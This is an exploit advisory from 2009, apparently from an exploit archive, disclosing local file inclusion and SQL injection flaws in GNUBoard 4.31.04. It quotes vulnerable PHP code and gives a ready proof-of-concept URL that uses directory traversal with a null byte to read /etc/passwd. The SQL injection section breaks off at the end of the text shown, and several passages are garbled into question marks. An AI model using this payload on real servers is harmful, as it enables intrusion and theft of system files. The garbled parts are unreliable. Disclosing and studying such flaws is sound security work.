[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : GNUBoard 4.31.04 (09.01.30) Multiple Local/Remote Vulnerabilities
# Published : 2009-01-30
# Author : make0day
# Previous Title : ReVou Twitter Clone (XSS/SQL) Multiple Remote Vulnerabilities
# Next Title : BPAutoSales 1.0.1 (XSS/SQL) Multiple Remote Vulnerabilities


GNUBoard V4.31.04 (09.01.30) Multiple Local/Remote Vulnerability
bY make0day@gmail.com

/*************************

SIR GNUBoard (VERSION 4.31.04 (09.01.30))is a widely used bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
But we find a file include vulnerability affects SIR GNUBoard.
In special conditions,it may be used as a remote file include vulnerability .
This issue  to  execute arbitrary  PHP code on an affected computer with the privileges of the affected Web server.
Here is the details:

**************************/
TEST ON VERSION 4.31.04 (08.01.30)

/***************************
Local File Inclusion Vulnerability

/poll_result.php

include_once("./_common.php");

$po = sql_fetch(" select * from $g4[poll_table] where po_id = '$po_id' ");
if (!$po[po_id]) 

????????

echo "<script language='javascript' src='$g4[path]/js/sideview.js'></script>";

if (!$skin_dir) $skin_dir = "basic";
$poll_skin_path = "$g4[path]/skin/poll/$skin_dir";
include_once ("$poll_skin_path/poll_result.skin.php");	//file include

*************************/

poc:
http://test.com/GnuBoard/bbs/poll_result.php?po_id=177&skin_dir=../../../../../../../../etc/passwd%00

/***************************
SQL Injection Vulnerability

/register_form.skin.php

<?
if (!defined("_GNUBOARD_")) exit;
?>

<style type="text/css">
<!--

????????

function fregisterform_submit(f) 
{
    if (f.w.value == "") {

        reg_mb_id_check();

        if ($F('mb_id_enabled')!='000') {	
            alert('?????????????